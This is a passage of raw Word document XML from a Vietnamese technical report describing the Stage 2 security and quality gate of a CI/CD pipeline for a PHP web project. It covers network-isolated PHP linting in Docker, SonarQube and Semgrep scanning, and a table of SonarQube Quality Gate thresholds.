                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> trên GitHub, đổi tiêu đề thành </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>release: vX.Y.Z - &lt;Mô tả phiên bản phát hành&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> và bấm Save.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>2.3. Quét lỗ hổng mã nguồn bằng SonarQube và Semgrep tại Stage 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi Pull Request vượt qua Stage 1 và hướng tới tích hợp vào nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, hệ thống kích hoạt chu trình kiểm định an ninh và chất lượng mã nguồn chuyên sâu tại Stage 2 (Dev Security &amp; Quality Gate). Giai đoạn này hiện thực hóa nguyên lý an ninh dịch chuyển về sớm (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Shift-Left Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>), ngăn chặn 100% các lỗ hổng an ninh nghiêm trọng (Critical/High), các điểm rò rỉ thông tin bí mật (Secrets Leakage) và suy giảm chất lượng mã trước khi được phép hòa vào dòng mã nguồn chung.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kiểm tra cú pháp siêu tốc bằng PHP Linting cô lập mạng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trước khi khởi chạy các công cụ quét mã nguồn nặng, đường ống thực thi công đoạn kiểm tra cú pháp nhanh với PHP 8.2 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">). Bước này khởi chạy một container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php:8.2-cli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> dùng một lần với cờ bảo mật cao nhất: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>--network none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ngắt toàn bộ kết nối mạng để triệt tiêu hoàn toàn nguy cơ rò rỉ dữ liệu hoặc gọi lệnh mạng ngoài ý muốn) và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>--mount readonly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (gắn mã nguồn ở chế độ chỉ đọc, cấm chỉnh sửa tệp tin). Lệnh thực thi:</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docker run --rm --network none \</w:t>
              <w:br/>
              <w:t xml:space="preserve">    --mount "type=bind,src=$GITHUB_WORKSPACE/InlaneWeb/web/src,dst=/src,readonly" \</w:t>
              <w:br/>
              <w:t xml:space="preserve">    php:8.2-cli sh -c 'find /src -type f -name "*.php" -print0 | xargs -0 -r -n 1 php -l'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quá trình này quét toàn bộ cây mã nguồn PHP chỉ trong vòng 2 giây, phát hiện ngay các lỗi cú pháp nghiêm trọng (Syntax Error, thiếu dấu chấm phẩy, khai báo hàm sai cú pháp) trước khi nạp vào các động cơ phân tích ngữ nghĩa phức tạp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sau khi vượt qua bước kiểm tra cú pháp nhanh, hệ thống kích hoạt song song hai động cơ phân tích an ninh tĩnh độc lập mang tính chất bổ trợ lẫn nhau:</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Mã nguồn PHP 8.2 trong thư mục InlaneWeb/web/src/</w:t>
              <w:br/>
              <w:t xml:space="preserve">                             │</w:t>
              <w:br/>
              <w:t xml:space="preserve">          ┌──────────────────┴──────────────────┐</w:t>
              <w:br/>
              <w:t xml:space="preserve">          ▼                                     ▼</w:t>
              <w:br/>
              <w:t xml:space="preserve">   [ ĐỘNG CƠ 1: SONARQUBE ]              [ ĐỘNG CƠ 2: SEMGREP ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">   - Phân tích cú pháp AST               - Truy vết luồng dữ liệu ô nhiễm</w:t>
              <w:br/>
              <w:t xml:space="preserve">   - Đo lường nợ kỹ thuật                - Bộ quy tắc OWASP Top 10 &amp; CWE-89</w:t>
              <w:br/>
              <w:t xml:space="preserve">   - Tiêu chuẩn code PSR-12              - Tập luật an ninh tự định nghĩa</w:t>
              <w:br/>
              <w:t xml:space="preserve">          │                                     │</w:t>
              <w:br/>
              <w:t xml:space="preserve">          ▼                                     ▼</w:t>
              <w:br/>
              <w:t xml:space="preserve">   Đạt chuẩn Quality Gate Rating A       Không có lỗ hổng nghiêm trọng</w:t>
              <w:br/>
              <w:t xml:space="preserve">          │                                     │</w:t>
              <w:br/>
              <w:t xml:space="preserve">          └──────────────────┬──────────────────┘</w:t>
              <w:br/>
              <w:t xml:space="preserve">                             ▼</w:t>
              <w:br/>
              <w:t xml:space="preserve">                  [ CỔNG DUYỆT TÍCH HỢP ]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.3.1. Bắt lỗi và đánh giá chất lượng mã nguồn bằng SonarQube</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Vị trí và thời điểm kích hoạt trong đường ống CI/CD:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">SonarQube được định vị tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Stage 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong tệp điều phối </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>.github/workflows/devsecops-pipeline.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Công đoạn này phụ thuộc trực tiếp vào kết quả của Stage 1 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>needs: [branch_policy_guard]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) và được tự động kích hoạt trong 2 trường hợp:</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Khi lập trình viên mở một Pull Request có nhánh đích là nhánh tích hợp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>github.event_name == 'pull_request' &amp;&amp; github.base_ref == 'dev'</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Khi có sự kiện đẩy mã nguồn trực tiếp vào nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>github.ref == 'refs/heads/dev'</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Môi trường thực thi cô lập (Ephemeral Container Sandbox):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Đường ống khởi chạy một vùng chứa SonarQube Community 26.9 độc lập ngay trên GitHub Actions Runner qua Docker, phân bổ 4GB RAM và thiết lập thông số nhân Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>vm.max_map_count=524288</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. Kịch bản </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/sonarqube.py bootstrap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tự động khởi tạo cấu hình dự án, cấu hình token bảo mật và nạp Quality Gate tùy biến.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tác tử quét SonarScanner phiên bản 8.1.0 phân tích toàn diện mã nguồn PHP 8.2: bóc tách cây cú pháp trừu tượng (AST), kiểm tra tuân thủ chuẩn phong cách PSR-12, đo lường độ phức tạp tính toán (Cyclomatic Complexity), trùng lặp mã nguồn, và đối chiếu với ngân hàng quy tắc an ninh cùng các điểm nóng bảo mật (Security Hotspots).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cơ chế cưỡng chế Quality Gate và bộ tiêu chuẩn định lượng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Hệ thống áp đặt chính sách Quality Gate tùy chỉnh khắt khe được đặc tả trong tệp cấu hình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/sonarqube-quality-gate.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bang"/>
        <w:spacing w:before="240" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 2.3: Bộ tiêu chuẩn định lượng Quality Gate của SonarQube</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2367"/>
        <w:gridCol w:w="2367"/>
        <w:gridCol w:w="2367"/>
        <w:gridCol w:w="2367"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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Chỉ số kỹ thuật (Metric)</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Điều kiện kiểm tra</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Ngưỡng bắt buộc</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Diễn giải tiêu chuẩn chất lượng</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Đánh giá Bảo mật</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>security_rating</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2367"/>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GT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Lớn hơn)</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1 (Hạng A)</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Tuyệt đối không chấp nhận bất kỳ lỗ hổng bảo mật nào (Vulnerabilities = 0).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Đánh giá Độ tin cậy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>reliability_rating</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2367"/>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GT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Lớn hơn)</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1 (Hạng A)</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Tuyệt đối không chấp nhận bất kỳ lỗi phần mềm tiềm ẩn nào (Bugs = 0).</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Đánh giá Khả năng bảo trì</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sqale_rating</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2367"/>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GT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Lớn hơn)</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1 (Hạng A)</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Tỷ lệ nợ kỹ thuật (Technical Debt Ratio) phải duy trì ở mức tối thiểu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Điểm nóng an ninh đã rà soát</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>security_hotspots_reviewed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2367"/>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LT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Nhỏ hơn)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2367"/>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100%</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Toàn bộ 100% các điểm nóng an ninh được chỉ định phải được rà soát và đánh giá.</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Tỷ lệ trùng lặp mã nguồn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>duplicated_lines_density</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2367"/>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GT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Lớn hơn)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2367"/>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10.0%</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Mức độ trùng lặp mã nguồn không được vượt quá 10% tổng số dòng mã nguồn thực thi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy trình ngắt đường ống (Break-the-Build Enforcement) và bảo vệ nhánh:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
